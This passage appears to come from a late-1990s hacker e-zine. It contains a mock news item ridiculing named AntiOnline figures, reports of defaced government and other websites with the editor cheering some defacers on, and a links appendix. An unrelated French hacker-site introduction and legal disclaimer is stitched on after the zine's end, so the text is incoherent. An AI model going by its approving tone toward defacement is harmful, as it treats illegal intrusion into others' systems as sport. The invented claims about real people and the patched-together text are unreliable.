"It's no secret my Father was a famous actor. And instead of letting the rumor mill swallow this down, I would rather tell it like it is.. Yes my father was Beaver Cleaver." Immediately after, JP played a Leave it To Beaver midi theme, put on a small baseball hat and walked out. When reached by phone JP has this to say, "Yes, AntiOnline is a hackers security site. But so what if my dad was Beaver Cleaver. I still have to stop hackers. And please cease with the Little Beaver emails. It's annoying and pointless. One of the reasons AntiOnline is so successful is because my dad told me to get revenge on the world for canceling his show. And that Beaver Cleaver dis-placed anger still lingers in me. So you can do anything you want to.. But remember, I have Beaver power!" It's not sure if Wally and the rest of the whole gang are open to questions. Last seen, Wourd Cleaver was still on AOL perfecting his scrolling skills. The FBI has also opened a case against suspected Granny Hacker from heck Carolyn Meinel on the grounds of dressing/looking like a crack friend and the possibility she is Wallies long lost best friend, Eddy Haskel. [Reporting for, Innerpulse News, this is Matthew Katona from signing off.] AntiOnline @HWA SITE.1 AntiOffline ~~~~~~~~~~~ is a parody of AntiOnline which has been around for some time now, check it out if you haven't already. @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit for 'the story so far'... From HNN rumours section see the archives section on HNN or for copies of many of these sites in their defaced form. June 28th contributed by Anonymous Cracked A busy weekend for some. Take a look at all the .gov sites. June 29th Contributed by Anonymous Cracked The following sites have been reported as cracked. June 30th contributed by Anonymous Cracked The following sites has been reported as compromised. July 1st Keebler Elves Strike Yet Another Government Server contributed by Code Kid Upset by the actions of John Vranesevich of AntiOnline and Harvard Universities overreaction the Keebler Elves have attacked another government web site. This time they have posted very derogatory comments about John Vranesevich on the web site of the Bureau of Reclamation, Rio Grande Operations. HNN Cracked Pages Archive July 2nd contributed by Anonymous Cracked The following sites have been reported as compromised over the last two days. - possible first crack of .int domain ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) hack-faq Hacker's Jargon File (The quote file) Original jargon file New Hacker's Jargon File. New jargon file Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: Go there Brasil........: Go there Go there Canada .......: Go there Columbia......: Go there Go there Indonesia.....: Go there Go there Go there Netherlands...: Go there Russia........: Go there Singapore.....: Go there Turkey........: - Turkish Scene is Turkey's first and best security related e-zine. Go there Got a link for this section? email it to and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- 1998, 1999 (c) Cruciphux/ (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]

Le but de ce site est de mieux comprendre la sécurité informatique.
Un hacker par définition est une personne qui cherche à améliorer les systèmes d'information dans le seul et unique but de contribuer à la stabilité de ces systèmes!
La croyance populaire laisse entendre que les hackers sont des pirates.
C'est vrai. Mais il y a différents types de pirate.
Tout comme il y a différents types de personnes.
Les bavures courantes auxquelles on pense lorsqu'on évoque le terme de pirate informatique
seraient les hacks de compte msn, ordinateurs lâchement trojantés avec des exploits déjà tous faits
et encore peut-on classifier en tant que hack le fait de spammer
alors que depuis plus de 15 ans des scripts tous faits le font extrêmement bien?

Ce ne sont pas des hackers qui font ça!!!
Nous appelons ces gens des lammers! Quand ils sont mauvais,
ou des black hat lorsqu'ils sont doués dans la mise en application de leurs méfaits.
Aucun amour propre - Aucune dignité
Agissent par dégout, vengeance ou simple plaisir.
Les raisons peuvent être nombreuses et je ne prétends pas devoir juger qui que ce soit.
Je pense juste que l'on ne doit pas utiliser l'épée de fly pour commettre des injustices.
Il est 100 fois plus profitable d'améliorer un système que de marcher sur un château de sable... même si marcher sur un château de sable est rigolo :P
A vous de trouver votre amusement. ;)

Tu peux réagir sur la shootbox

Disclaimer Veuillez lire obligatoirement les règles ci-dessous avant de consulter ce site.
Conformément aux dispositions des différentes lois en vigueur, intrusions et maintenances frauduleuses sur un site, vol et / ou falsification de données.
Vous ne devez en aucun cas mettre en application les stratagèmes mis en place par ce site, qui sont présentés uniquement à titre d’éducation et de recherche dans le domaine de la protection de données.
Vous ne devez en aucun cas utiliser ce que vous aurez découvert, sauf si vous avez une autorisation écrite de l’administrateur d’un site ou que celui-ci vous ai ouvert un compte uniquement pour la recherche de failles.
Tout cela est interdit et illégal ne faites pas n'importe quoi.
Vous acceptez donc que l'administrateur de ce site n'est en aucun cas responsable d'aucun de vos actes. Sinon quittez ce site.
Vous êtes soumis à ce disclaimer.